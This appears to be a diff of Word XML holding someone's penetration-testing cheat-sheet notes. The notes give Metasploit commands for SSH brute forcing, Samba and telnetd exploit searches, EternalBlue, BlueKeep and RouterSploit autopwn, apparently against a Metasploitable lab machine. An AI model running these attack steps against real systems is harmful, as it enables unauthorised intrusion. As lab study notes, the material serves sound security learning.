+              <w:t xml:space="preserve"> CL: run</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>CL: s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>essions</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>sessions</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> 1</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>FROM DESKTOP</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: ssh msfadmin@{IPADDRESS}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Eternal Blue</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>CL: search eternalblue</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>DoublePulsar</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Blue</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Need to install</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>Sudo su</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>Sudo dpkg –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>BlueKeep -RDP Vulnerability</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Routersploit</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>https://github.com/threat9/routersploit</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="6"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Follow the instructions in github</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+              </w:rPr>
+              <w:t>apt-get install python3-pip</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+              </w:rPr>
+              <w:t>git clone https://www.github.com/threat9/routersploit</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+              </w:rPr>
+              <w:t>cd routersploit</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+              </w:rPr>
+              <w:t>python3 -m pip install -r requirements.txt</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+              </w:rPr>
+              <w:t>python3 rsf.py</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>CL: help</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: search scanners</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use scanners/autopwn</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: show info</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> or show options</w:t>
@@ -2883,170 +3744,7 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: set target {number}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: exploit</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>Netcat – allow connection to UDP and TCP</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>CL: nc -help</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Telnet</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>CL: Searchsploit Linux tetnetd</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>CL: search Linux telnetd</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>CL: telnet {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>SMB</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: searchsploit samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: searchs samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/smb/</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>FIND THE VERSION</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/smb/smb_version</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/smb/{VERSION}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: show </w:t>
-            </w:r>
-            <w:r>
-              <w:t>info</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> or show options</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:r>
-              <w:t>set RHOSTS {IPADDRESS}</w:t>
+              <w:t>CL: set target {IPADDRESS}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3054,277 +3752,10 @@
               <w:t>CL: run</w:t>
             </w:r>
           </w:p>
-          <w:p>
-            <w:r>
-              <w:t>GET VERSION</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>REPEAT</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: searchsploit </w:t>
-            </w:r>
-            <w:r>
-              <w:t>Samba 3.0.20</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:r>
-              <w:t>user {PATHNAME}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>BRUTEFORCE</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>–</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> attack</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> SSH</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: search SSH</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:r>
-              <w:t>use auxiliary/scanner/ssh/ssh_login</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: show info</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>PASS_FILE</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>USER_FILE</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>SET RHOST</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve"> CL: run</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>CL: s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>essions</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>sessions</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 1</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>FROM DESKTOP</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: ssh msfadmin@{IPADDRESS}</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
           <w:p/>
         </w:tc>
       </w:tr>
@@ -3372,7 +3803,197 @@
       </w:tr>
     </w:tbl>
     <w:p/>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="4675"/>
+        <w:gridCol w:w="4675"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
     <w:p/>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="4675"/>
+        <w:gridCol w:w="4675"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
